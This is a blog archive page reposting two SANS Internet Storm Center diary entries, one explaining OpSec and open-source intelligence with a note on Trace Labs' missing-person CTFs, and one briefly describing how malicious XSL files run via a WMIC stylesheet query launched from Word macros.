Blog

Archive for July 6th, 2019

OpSec and OSInt , (Sun, Jul 7th)

Operations security (OpSec) is a military term that has evolved into the InfoSec realm.  In a military context OpSec describes a process that identifies critical information to determine if friendly actions can be learned or observed by enemy intelligence, and if the information obtained by the enemy could be useful to subvert operations.

In the InfoSec realm OPSec is the process of determining what publicly available information is available about an organization and to determine if the information, either individually or in aggregate, could be used by a nefarious individual to do damage to the organization.

A trivial example of where publicly available information could be used by the bad guys is Spear Phishing.  The list of company executives taken off of a company website combined with the format of the corporate email addresses can be used to craft and deliver a spear phishing email.

Open Source intelligence (OSInt) is the process of determining what information is publicly available.

There are many tools available to assist with OSInt, starting with Google, but finding the right tools to sift through the myriad types of information is difficult. An excellent resource for finding those tools is the OSInt Framework.  The OSInt Framework is a huge mindmap of available OSInt tools classified by the type(s) of data they are useful for.  

In the last couple of weeks I stumbled on a creative use for OSInt.  A non-profit organization called Trace Labs is using crowd sourced Open Source Intelligence to gather verified information for missing person cases.  After a few weeks of information gathering the information is turned over to the police. They have also gameified the OSInt process through virtual capture the flag (CTF) events as well as CTF events at B-sides and other conferences. Trace Labs next virtual CTF event is on Saturday July 13th. 
 

— Rick Wanner MSISE – rwanner at isc dot sans dot edu – http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Malicious XSL Files, (Sat, Jul 6th)

In yesterday’s diary entry “A ‘Stream O’ Maldoc”, the payload was an XSL/XSLT file.

Now, malicious XSL files will not execute just by double-clicking them. On a default Windows install, Internet Explorer will be lanched to display the content of the file as XML:

But in this case, the malicious Word document contains VBA code that will launch a WMIC query with the XSL file as stylesheet:

This results in the execution of the code inside the XSL file, as discovered and reported by subTee/Casey Smith last year.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →